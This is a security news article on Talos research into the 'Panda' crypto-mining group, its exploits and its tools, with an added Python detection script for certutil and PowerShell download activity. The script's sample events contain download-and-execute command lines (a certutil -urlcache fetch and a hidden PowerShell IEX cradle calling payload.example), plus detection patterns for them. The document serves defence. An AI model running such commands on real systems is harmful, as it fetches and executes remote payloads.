
‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.


Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).


Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.
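The TTPs described above (a web application exploit spawning a shell, certutil used as a downloader, a PowerShell download cradle) are all visible in process-creation telemetry. The following is an added detection example, not code from Talos or from the article; the events, domains and paths it scans are constructed samples, not indicators from the report.

```python
import re

# Constructed process-creation records, modelled on the TTPs the article
# describes (web-app exploit -> shell -> certutil/PowerShell download).
# None of these are real indicators from the Talos report.
SAMPLE_EVENTS = [
    {"parent": "java.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://payload.example/x.txt C:\\Windows\\Temp\\x.exe"},
    {"parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil -hashfile C:\\tools\\setup.msi SHA256"},
    {"parent": "w3wp.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://payload.example/p.ps1')"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Processes that normally host exploited web applications (WebLogic and Struts
# run under java, IIS under w3wp); a shell spawned by them is a strong
# post-exploitation signal. The list is an assumption for this example.
WEB_SERVER_PARENTS = {"java.exe", "javaw.exe", "w3wp.exe", "php-cgi.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}

CERTUTIL_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\b.*\s-urlcache\b", re.I)
PS_CRADLE = re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)", re.I)
PS_HIDDEN = re.compile(r"-(w|windowstyle)\s+hidden|-nop\b|-enc(odedcommand)?\b", re.I)

def classify(event):
    """Return the list of rule names the event matches (empty = benign)."""
    hits = []
    cmd = event["cmdline"]
    if CERTUTIL_DOWNLOAD.search(cmd):
        hits.append("certutil_urlcache_download")   # LOLBin used as a downloader
    if "powershell" in event["image"].lower() and PS_CRADLE.search(cmd):
        hits.append("powershell_download_cradle")
        if PS_HIDDEN.search(cmd):
            hits.append("powershell_hidden_or_encoded")
    if event["parent"].lower() in WEB_SERVER_PARENTS and event["image"].lower() in SHELLS:
        hits.append("webserver_spawned_shell")        # web-app exploit -> shell
    return hits

def scan(events):
    """Map each suspicious event's command line to the rules it tripped."""
    return {e["cmdline"]: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS).items():
        print(", ".join(rules), "<-", cmd)
```

Legitimate certutil use (hashing, certificate import) does not trip the download rule, which keys on `-urlcache`; the parent-child rule is the one worth tuning per environment, since some web servers legitimately spawn helper processes.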

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
